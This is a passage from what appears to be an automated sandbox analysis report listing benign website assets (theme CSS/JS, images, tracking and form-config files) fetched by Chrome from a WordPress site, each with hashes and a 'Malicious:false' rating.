                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):27289
                                                                                                                                              Entropy (8bit):5.290183523103714
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:/JN9NvO3tS5vXqZTkNCM9r4TNgSJmlq9nScaXnuF4P:BN9Nv4t+XqZGwNgSJ4qlSzuF4P
                                                                                                                                              MD5:AD62A910EE89CB38055B4E8357284004
                                                                                                                                              SHA1:227041543BEC7A5208B0761A17DE888BD595B794
                                                                                                                                              SHA-256:68085A4480B125AB77222E871A3A3DE546F6BEF60C6E6AD638355BB23BE1DCD1
                                                                                                                                              SHA-512:B3D2AF1A4061A5F1139D1941F20B8C2DA39EF2C1CA08A4700AF651756DA9E4A355F2640ADE90126B963DDF4ECF4585BAC3B7DE9D00EA23799A8435AA21B3FFCB
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR...K...J.....|p>.....pHYs.................iCCPPhotoshop ICC profile..x..wT.Y.......-!.RBo....k...FH ...B.......X...eDFD... cA,X..{..AE]..6T....{v..=g.s.9..{........Nr.R1...-..b...I.)l.. .......\.ott8...p.....6\.T..[...sy.H4...sy...1...'....$.0^*......`..S..-...Lr=.0.&............D.re...].`...r..'....E.....x.\>.M........h..`..O>...LSzr..%O......Q.T.].....+..0...P....$..&kI..%i.QS,.O......!.S...O.b>7 l..Y.S.M...9qS,[.....#....%....Nq.(.3....)..%DNqnVl......S.({..)g.....K...Q.....G...#..)}......J=7/VyV..S....i.h.."..<y.29.....r.H ..}.Rq:.#...b;...$%..'......@XW...N....D0.q..N<.`|.........)dy.......P.&h.>.....8...@ .B..A2,...!.d...`..C)l..P......!8.mp...E..}p......K...0. ...#.D.1@L.k..qE..@$..A..TD.H..R..CJ.2...4"."'...e....."#.[....4...f.l...E..8t!*@s.|...V.u.A..=.^Eo...Kt.....0C..s...(,...d.*.....f....n`..+.3..c..8.........rp.p.qU...V.y... n...O.....x.>././...+..............E0'..B..L...F..B....O."...Dm.5..E....b.N.A...u.0...J2 9..H)$.i-..t.t.t
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):23077
                                                                                                                                              Entropy (8bit):4.911677492624258
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:gMybakaQxizORQOupjvwenWjWzvHaI8agy6Gupgd/6sbOxYv3:gPakxMznO0jFnWSbLryssYP
                                                                                                                                              MD5:9E21BB665D0B5A15EB7FCA931D60523B
                                                                                                                                              SHA1:F51855E2FF2F7BAB57CD03AA190D749CF90357C3
                                                                                                                                              SHA-256:157C0E609B5F8A0A961A305ADFD944420DBE37057248785A99175DF73FDD1A9F
                                                                                                                                              SHA-512:CDC1B9FC58F6C4C5D87191DB27C32F657E1845CC15A36705090BCDD0D22B07A0C45FF23E013EF6151494EE67C2870B8A01B5FE009CC3F002F97F63DC6A326E81
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// .// AVIA VIDEO API - make sure that youtube, vimeo and html 5 use the same interface.// .// requires froogaloop vimeo library and youtube iframe api (yt can be loaded async).// .// -------------------------------------------------------------------------------------------...(function($).{. "use strict";...$.AviaVideoAPI = function(options, video, option_container)..{....this.videoElement = video;......// actual video element. either iframe or video...this.$video.= $( video );......// container where the AviaVideoAPI object will be stored as data, and that can receive events like play, pause etc ...// also the container that allows to overwrite javacript options by adding html data- attributes...this.$option_container = option_container ? $( option_container ) : this.$video; ......// button to click to actually start the loading process of the video...this.load_btn = this.$option_conta
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):6692
                                                                                                                                              Entropy (8bit):4.916156028842652
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:tydYchzMcUWgB1nYWDcbN4wJnWjwJk8TzIrOgO6AWV5RcZ7R/Y9:tMYzNYWDcbdcCkW65VMjY9
                                                                                                                                              MD5:A8083D6C5E2234AE35263CF86AB3EA07
                                                                                                                                              SHA1:0513AD94FDA268AD099C149767F4A97F351268DE
                                                                                                                                              SHA-256:B68A042795CB44D7818FCAE591DE596D70D414D0C31634016DB34E8E7C3BF8FB
                                                                                                                                              SHA-512:FFF43160545FB5AE509E9B9E8FE3FD877A0C15B10C65756453B8ED3C5AEDA42FB7BAD74CFE9DE235C3FD1DC20C95C8A488D53EA2A5A4DD4CFD3294CB53E9659E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/table/table.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Table.====================================================================================================================================================== */../*data table*/...div .avia-table {background: transparent; width:100%; clear:both; margin:30px 0; table-layout: fixed;}..avia-data-table .avia-heading-row .avia-desc-col{border-top:none; border-left:none;}..avia-data-table .avia-button-row td{text-align: center;}..avia-data-table .avia-center-col{text-align: center;}..avia-data-table td:before{display:none;}..avia-data-table .avia-pricing-row td, .avia-data-table .avia-pricing-row th{text-align: center; font-size: 40px; line-height: 1.3em}..avia-data-table .avia-desc-col{text-align: right;}..avia-data-table .avia-pricing-row small{display: block; font-size: 11px; font-style: italic; line-height: 1.7em; }..avia-data-table .avia
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):614
                                                                                                                                              Entropy (8bit):4.966361742203004
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:9gGJJvPVimIt8zEaOWmlU1VwNcTXVElHLQmfKoMijyAvV+Y3XnTNfXmDH:999VimItHaOWX1GcTXCEz2ywXnpfOH
                                                                                                                                              MD5:9F0550AA2AF3E92B68101D207A65F9DD
                                                                                                                                              SHA1:DA64F09724EBA9F2EE89FFAFBA588625574CD7E2
                                                                                                                                              SHA-256:3CF7C0660C3BC7472D44B915CB0315D4E34D616AB229DFD3CEB7AECB2BDC5B1D
                                                                                                                                              SHA-512:92260F5B392C4FB13D7ECD162D48BE12C60E7E430CF0C2386472CA460565CDB30967F3DCFB9FA91F5B0CB29C5395826883EBC38054CDC2C877AEED9CB3334389
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.(function($).{.. "use strict";....$(document).ready(function()..{. .../**... * Remove Themes duplicated language switcher flags from Burger menu... *..- exist in secondary menu... *..- exist beside search icon... */...$('body').on( 'avia_burger_list_created', '.av-burger-menu-main a', function(){....var s = $(this);.........//.allow DOM to build....setTimeout(function(){.....var switchers = s.closest('.avia-menu.av-main-nav-wrap').find('.av-burger-overlay').find('.language_flag');.....switchers.each( function(){........$(this).closest('li').remove();......});.....}, 200);...});..});.....})( jQuery );.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):4481
                                                                                                                                              Entropy (8bit):4.959411901855455
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:JaAxTfF1LYVXrJjzVB1XSq7oxN3cLeUM5iIJ1wlB:jOVbJHN7+j4IJ8
                                                                                                                                              MD5:5F06BA8AAB38E561844753088F41430E
                                                                                                                                              SHA1:572214AEE1E9B2E9421F6C428D68BFCD3EE480B0
                                                                                                                                              SHA-256:64B02B00715244E97EF63C0CBE3898BC82131E6C3E18535529DAA8A06994EF64
                                                                                                                                              SHA-512:613ABDB8C1583A90E690BC49E211DF36ADF54024721F4E184D984426A17BE399C67350423C4E844EA0F627844C99700081A3E72A29A2825F9B24703DB5E50E1B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/menu/menu.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.SUBMENU.====================================================================================================================================================== */..#top .sticky_placeholder.{ height:51px; position: relative; clear:both; }.#top .av-submenu-container.{ min-height:52px; position: relative; width:100%; border-bottom-style: solid; border-bottom-width: 1px; -webkit-perspective: 1000px; -webkit-backface-visibility: hidden; font-size: 13px; line-height: 1.65em;}.#top .av-submenu-container.av-sticky-submenu{position: absolute;}..#top .av-submenu-container .container{padding:0 !important;}.#top .av-subnav-menu. { margin:0; }.#top .av-subnav-menu li {position: relative; display: block; margin:0;}.#top .av-subnav-menu > li {padding:15px 0; display: inline-block;}.#top .av-subnav-menu > li > a{padding:0px 10px 0px 12px; display:
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 333 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):25096
                                                                                                                                              Entropy (8bit):4.968019197309454
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:QJN9NvOKt05UD7aqNGnVlZg/3Xnf7TeHMJe:0N9NvJtB+DZg78MJe
                                                                                                                                              MD5:D80AC861EC95C47E067F19CF62DF6566
                                                                                                                                              SHA1:251E3EDC59011BD7D7B45059431C19E4EE9F31DE
                                                                                                                                              SHA-256:C510646040C6062D1369F5E7FAF1D2F9984036AC3EC49C204C6C4E0B79ED2FBF
                                                                                                                                              SHA-512:F406B238838565E9BCDD3B037D1153DFC96A0BD0DEADBC1B1B25AEF72D34777165EB24F710292DF046B905F83F9913A56E2538919E6F38684FDA442E33AD9A8F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR...M...2.......d....pHYs.................iCCPPhotoshop ICC profile..x..wT.Y.......-!.RBo....k...FH ...B.......X...eDFD... cA,X..{..AE]..6T....{v..=g.s.9..{........Nr.R1...-..b...I.)l.. .......\.ott8...p.....6\.T..[...sy.H4...sy...1...'....$.0^*......`..S..-...Lr=.0.&............D.re...].`...r..'....E.....x.\>.M........h..`..O>...LSzr..%O......Q.T.].....+..0...P....$..&kI..%i.QS,.O......!.S...O.b>7 l..Y.S.M...9qS,[.....#....%....Nq.(.3....)..%DNqnVl......S.({..)g.....K...Q.....G...#..)}......J=7/VyV..S....i.h.."..<y.29.....r.H ..}.Rq:.#...b;...$%..'......@XW...N....D0.q..N<.`|.........)dy.......P.&h.>.....8...@ .B..A2,...!.d...`..C)l..P......!8.mp...E..}p......K...0. ...#.D.1@L.k..qE..@$..A..TD.H..R..CJ.2...4"."'...e....."#.[....4...f.l...E..8t!*@s.|...V.u.A..=.^Eo...Kt.....0C..s...(,...d.*.....f....n`..+.3..c..8.........rp.p.qU...V.y... n...O.....x.>././...+..............E0'..B..L...F..B....O."...Dm.5..E....b.N.A...u.0...J2 9..H)$.i-..t.t.t
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 18 x 12, 8-bit/color RGB, non-interlaced
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):600
                                                                                                                                              Entropy (8bit):7.393135725142834
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:6v/7t5Z2Sk4hy7qYpClCUxPxZEZEx54fvYygSa7Aoqm4XK4Qi:GaHsXwZe5442kX6
                                                                                                                                              MD5:2878F64A0217A154E531853F6A822C65
                                                                                                                                              SHA1:AC7A53E9F53B9DE8A344C38222E217D50D559B83
                                                                                                                                              SHA-256:3F47C75FA68E49B1CDCA50C61E9CD6603B57C521E5E6809DF59A4A15E291A4EF
                                                                                                                                              SHA-512:0885BC73E9364C2B3C3730DCC5430E74BD17C3AB84F85A0FF33002BBBA95F6650622650BBAC35B05505978B58D98584F0C78B6A471E6449D33E333729C1FA0DC
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/plugins/sitepress-multilingual-cms/res/flags/en.png
                                                                                                                                              Preview:.PNG........IHDR..............pz....+tEXtCreation Time.za 31 dec 2005 17:13:07 +0100.......tIME........O.^....pHYs...........~.....gAMA......a.....IDATx.c._Y....._....``h..e.^...." ...Tp.k.w..?k.2}.`pu.zt....."{...@..............<..gzi....[.....zJ..<I.......C..JJ.ww.~*&.D@....z.k3...6....3..!...:4..W?@.]>...D..PF."..?..=b@.O-,....h...{..=.... B...a`x...D.z.@.#Y....+).re..........3j.XY........g..MK.I...y..?..........V.5.~8......N....C...T.a.c.c.l..:....E......b.=...O.8&...k=.T....;..@.@...*BBL::..].ul...5...-,v.....Z..<.$ .........G..5G......c-/.~|.....}2.8.....IEND.B`.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):4572
                                                                                                                                              Entropy (8bit):4.891587200351582
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:8Eey5f23X3esSoekexInW5fmQsisCoulvnmGbpAlTkBVTLC0oVT9:8EN5f23X37SornkmMdlvnmQpAlTkBFLk
                                                                                                                                              MD5:141D4C372D239520927095163E541D32
                                                                                                                                              SHA1:E340BCF0991973B23401F6F20BFB1DCFA13CE03A
                                                                                                                                              SHA-256:3A077C2F819F01AE4F445270DAC594E4CF4066EF576A50A15896C42E1E2FBE20
                                                                                                                                              SHA-512:D0D3459B0CB75468B5980A841F9BF2A2925CA5DA3F64315F355696705A3D12EF8417714E1E3D27353FF6FA4DD70C883B3A2816B46FB6B744D15C72C6B60C2B39
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/toggles/toggles.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Accordion/Toggle.====================================================================================================================================================== */.../*toggle*/..js_active .toggle_wrap{.visibility: hidden;.position: absolute;.z-index: 0;.width: 100%;.left: 120%;.}...active_tc.toggle_wrap{.position: static;.visibility: visible;.left:0;.width:auto;.z-index: 1;.display: none;.}...js_active .toggler {.cursor: pointer;.display: block;.margin:0;.padding: 9px 3px 9px 35px;.position: relative;.top: 1px;.border-style:solid;.border-width:1px;.line-height: 1.65em;.-webkit-touch-callout: none;.-webkit-user-select: none;.-khtml-user-select: none;.-moz-user-select: none;.-ms-user-select: none;.user-select: none;.}...togglecontainer{.margin:30px 0;.position: relative;.clear: both;.}...togglecontainer .single_toggle:first-child
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 408 x 464, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):18160
                                                                                                                                              Entropy (8bit):7.9507935414647015
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:E6bVK9GIzUQWsZdSawiqS61S3z+Ai3Azy1tL62pW1l0Z86vjNPTN:E6pLIAw2aFqSWS3z+AMZ3k/6vhN
                                                                                                                                              MD5:CC6D2A2EBBDB4CA2D35C2A94F666E56C
                                                                                                                                              SHA1:7B9695FBE92878E751DB650F89A9E9A74279EE10
                                                                                                                                              SHA-256:DEDCB23076BE667A897F4A90BDE0BC80C6A6A58CFE68433BDE59546EB9B74EB5
                                                                                                                                              SHA-512:C9E27F2AAF2AEF1CA88C45EBA39DB2D1C16BAF6886EDDB39FB6723A97320E31697FB53AA8B885B1E445D2F361F91BE0A75B14399D990953D543735A400320E16
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR..............0|T..F.IDATx..[l\G..Gq[.j..-.......Q.b....:.=.K.6@#KP..U.!(B&!..i......j.B.$>g...%.(.u..H.T.....P5q..gw......H.b;.b.....f...d.....3C.....B..W.Y..o....c..>k..M$x..L....x"...@..>..N.\..}o>'...Z.=.bd.[c..g.w.9~......!....<E......!....QCd...#_..w.....r7.>...U*..?....u...[G.....wG4....+....X...-.R>.,z:.X.X....c.B%60u).._...g.:......._.[...N...t-.)S.J.g<...:.3.Dv.........T..z.#..y_PL......~.nv.k...Z.#...G..^.D..k...jS..m....Ti.J......*..e _..j.,3j..."..4....#.!sSZ@....RS.K..1.~..d.t.Ra.........T7....L..RK4].....h....\...L./....Q...o.Y-...9.EF.].;!.NS.9.e3..!.2....U..T.'.....%c..IC2.....W.S...v?...MP.{[..7&...t.....p.........V.NF5..J....+5=n%..?T..$.....GK...&..-....3:'(.........}...-...zv2...m.T..V.R.d.Z.......a~.G.xz....M..KT...P....7......X..h<}.d..`.NU;>}|^0k#"S1..^.i..3L.r.9|Os.......S..>V.;.xy4..d...*.Z.|f.pKL.....:.........=.~....;z..n...M.D1.OMC2.L..Sc..f..G.Y..L.&..h&.hX.}m..XW....P.zU..&.....d ..+.i.h.u&B......r....
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1782
                                                                                                                                              Entropy (8bit):4.907881383550967
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:oZYZ3m5KnG2yj/iyiiGibYeX/QiDjhgGo2mUGbvybQbcNZe/oYYIXJiWGrjLVWw1:g/mxyziypbKckyQ8ZeVPGfH/9
                                                                                                                                              MD5:3C711BE05B8B99FF511929A32A65FF4E
                                                                                                                                              SHA1:471AE4F8052AE9BC6528E7BE1DD57D3461C01F9F
                                                                                                                                              SHA-256:D7C9B8D74BF2D734B1215CA56D81F9BED8DD251405A99D406C44E27FC6C9D2EA
                                                                                                                                              SHA-512:EAA1ADDD6239859003A10D33B7CABF4420B2DBD5DEE3BF0DD4E1C201F301860A6E471B519763ED0B58B28AE39F91DD49A02120FA733A805A337E039C139C1580
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/magazine/magazine.js?ver=6.0.9
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// .// AVIA Magazine function for magazine sorting.// .// -------------------------------------------------------------------------------------------.(function($).{ .."use strict";....var animating = false,...methods = {......switchMag: function(clicked, _self)...{....var current ..= $(clicked)........if(current.is('.active_sort') || animating) return;........var filter...= current.data('filter'),.....oldContainer.= _self.container.filter(':visible'),.....newContainer.= _self.container.filter('.' + filter);........//switch Class....animating = true;...._self.sort_buttons.removeClass('active_sort');....current.addClass('active_sort');........//apply fixed heiht for transition...._self.magazine.height(_self.magazine.outerHeight());........//switch items....oldContainer.avia_animate({opacity:0}, 200, function()....{.....oldContainer.css({display:'none'});.....newContainer.css({opacity:0, display
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):2080
                                                                                                                                              Entropy (8bit):4.748470821267847
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:4L9E2Q8Zgwl4TtWYWUP+QzQlitVUkeVPW:4GIgwl4pfWU2RsVUkeo
                                                                                                                                              MD5:0DCEDA7E2D57833B75D29EE61E5AF2A5
                                                                                                                                              SHA1:49587E7720FB374F01A3F69E22641A33E2958E66
                                                                                                                                              SHA-256:E6B9CEDB6592510EE8F3A5824D1C6F758165211EA1FDF85042C0B0DA9DF34AED
                                                                                                                                              SHA-512:87FADCBA1F71710AEDCC17A2752E1C990EF599F3EB756913D1BA139130C50FE681FAFC088A9DBCC890EFE3591C27A65CD854C1674E8BDDC30CB453C7AD1C2A5A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/audio-player/audio-player.js?ver=6.0.9
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// .// AVIA Player.// .// -------------------------------------------------------------------------------------------.(function($).{ .."use strict";....var autostarted = false,...container = null,.....monitorStart = function( container )....{.....var play_pause.= container.find('.av-player-player-container .mejs-playpause-button');..........if( play_pause.length == 0 ).....{......setTimeout( function(){........monitorStart( container );.......}, 200 );.....}..........if( ! play_pause.hasClass('mejs-pause') ).....{......play_pause.trigger( 'click' );.....}.........};....$.fn.aviaPlayer = function( options )..{....if( ! this.length ) return; ....return this.each(function()...{....var _self ...= {};........_self.container..= $( this );...._self.stopLoop..= false;........_self.container.find('audio').on('play', function() {..........if( _self.stopLoop )..........{...........this.pause();.........
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (15660)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):18617
                                                                                                                                              Entropy (8bit):4.746740754378132
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:Unb0kcuPTb9Uh31//bEP+XgA1N9CleffJmp3:Ub0/U9Uh31//YWXgAJffC3
                                                                                                                                              MD5:32BEB68A374E3AEAC00ABDF9E12B84EA
                                                                                                                                              SHA1:B5D18AA625E8696DD9D07CD0869337717B211AE0
                                                                                                                                              SHA-256:5AAD5FBD4238981A9FF5E2772FF1353DFE1A801FB49542FE157418C1438F7782
                                                                                                                                              SHA-512:8FC41038B4DC2FC2465422FB3144B71C2ACD2F4552607369314FEC9B7F561B7A3919CDC4219DF2089395241168FFBFE29E67DDDA834E66C27E4C88066C8F4496
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-includes/js/wp-emoji-release.min.js?ver=6.0.9
                                                                                                                                              Preview:/*! This file is auto-generated */.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var f={base:"https://twemoji.maxcdn.com/v/14.0.2/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return b(d);return b(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:i},onerror:function(){this.parentNode&&this.parentNode.replaceChild(g(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return("string"==typeof d?function(d,a){return o(d,function(d){var u,f,c=d,e=x(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,n),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,n,r,o,i,s,l=function d(u,f){var c,e,b=u.childNodes,a=b.length;for(;a--;)c=b[a]
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):17988
                                                                                                                                              Entropy (8bit):4.967401517041867
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:zwhscXdDm9Galm4qUpQvThkvPwSvv4vlZkFOKcRQg:mseDiGalm4V2vTC3wSn4vlZkFOhR5
                                                                                                                                              MD5:4AEE9C2F018EF30AFC795F8038728804
                                                                                                                                              SHA1:EE68C8F30FC49789DE9A2ECD6FB1B794A52A506D
                                                                                                                                              SHA-256:D716B65133B33AB2C4A37DA86151428DFB741AAF62FB6637C6923B8B972C4AE7
                                                                                                                                              SHA-512:19EBBD58936E419F0085857645EB0FD1A67D3DDBDACC2E9E80105824174D171E8A2CA6E0138BB0CB9E52EEE8D3D20ADB0EF0019E47F173FD003937C97DF819C2
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/masonry_entries/masonry_entries.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Masonry Grid.====================================================================================================================================================== */...av-masonry{.position: relative;.overflow: hidden;.clear:both;.}...av-masonry-container{.width:100.4%;.float:left;.clear:both;.position: relative;.}...av-masonry-entry{.position: relative;.display: block;.width:24.90%;.float:left;.clear: none;.text-decoration: none;.visibility: hidden;.opacity: 0;.}..#top .masonry-no-border{border-top:none;}...av-masonry-entry.av-landscape-img{.width:49.80%;.}....av-masonry-col-2 .av-masonry-entry{width:49.80%;}..av-masonry-col-2 .av-masonry-entry.av-landscape-img{width:99.50%;}...av-masonry-col-3 .av-masonry-entry{width:33.3%}..av-masonry-col-3 .av-masonry-entry.av-landscape-img{width:66.6%}...av-masonry-col-4 .av-masonry-entry{}..av-m
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):118584
                                                                                                                                              Entropy (8bit):4.892184868161695
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:MfRA1RAzJJf6d23Mp2rwRJkg0P03+nSWmsUwU7jNkU2dxTMCzGfI3b6beV0jq85t:MZALAQ0c
                                                                                                                                              MD5:3145B6E53E8C3C59F34303D95642A9AD
                                                                                                                                              SHA1:808D0C750AB996A58268C5DE68BB1484700030A6
                                                                                                                                              SHA-256:DA477638BCA4A28114371065135F7F9B388C939AE8DBBDF528A17E6C931872ED
                                                                                                                                              SHA-512:BFCDD95E342C9BA8CF736FED98754974246D194461FCB56D1D38F8884D617A7012083FB9B4E6DD8A8F45D8CE988926032EC8EAB10524C0622852BE0E8DF5D1A8
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"id_form":1,"titolo":"WEB","settings":{"custom":[{"tipo":"2","value":[{"tags":[],"value":"Sala interna / Indoor","prezzo":""},{"tags":[],"value":"Dehor esterno / Outdoor","prezzo":""}],"attivo":false,"titolo":"Dove preferirebbe stare? / Where would you rather be?","obbligatorio":true,"value_BackUp":[{"tags":[],"value":[{"nome":"Sala interna / Indoor","lingua":"it"}],"prezzo":""},{"tags":[],"value":[{"nome":"Dehor esterno / Outdoor","lingua":"it"}],"prezzo":""}],"titolo_BackUp":[{"nome":"Dove preferirebbe stare? / Where would you rather be?","lingua":"it"}]},{"tipo":"2","value":[{"tags":[{"tag":"coppia","tipo":"custom","id_tag":102,"not_editable":false}],"value":"Coppia / Couple","prezzo":""},{"tags":[{"tag":"famiglia","tipo":"custom","id_tag":94,"not_editable":true}],"value":"Famiglia / Family","prezzo":""},{"tags":[{"tag":"lavoro","tipo":"custom","id_tag":107,"not_editable":false}],"value":"Lavoro / Work business","prezzo":""},{"tags":[{"tag":"amici","tipo":"custom","id_tag":103,"not
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (9284)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):245020
                                                                                                                                              Entropy (8bit):5.453937870555613
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:6FLeYH8W1WJ/37Oec8NteqZEbkxZNsucrl0xYurPK7d3fCX:6FLeYcgWJzm8NNfFcrHurPK7d3KX
                                                                                                                                              MD5:C281685D97DFB326E485D666280531A0
                                                                                                                                              SHA1:8E0F1416D573E76DDA51F3640614C004D44C4520
                                                                                                                                              SHA-256:4B851BD9AF5635C2682387427EB718D453B8E7AEEFDBB01C8521AB32A49004B3
                                                                                                                                              SHA-512:5AC00DFDC037F1ED98B7635FB1CBDD816FCBF72DD26BD3E34C49E13544ACE623ED50A9D59B9696DAE7CC1384DBA0529A1AFB78A80032A4ED10006A4F6496ED82
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://connect.facebook.net/en_US/fbevents.js
                                                                                                                                              Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):5625
                                                                                                                                              Entropy (8bit):4.878273363741113
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:wnrW+bBUZafeWmSip+GWRRc5Zor5ZJkf1Cr6HWVwer:wC2UZafeWg+GWQmJkCr6C
                                                                                                                                              MD5:186D34DB6D4ACC17DC4E66BEE448BAD3
                                                                                                                                              SHA1:76592404E604D0C90496D56372825A7EE725A1E6
                                                                                                                                              SHA-256:080705ED953BE6AD5A5F2E37205DD7A45EE534D68A193479235DB9DAB459B0FB
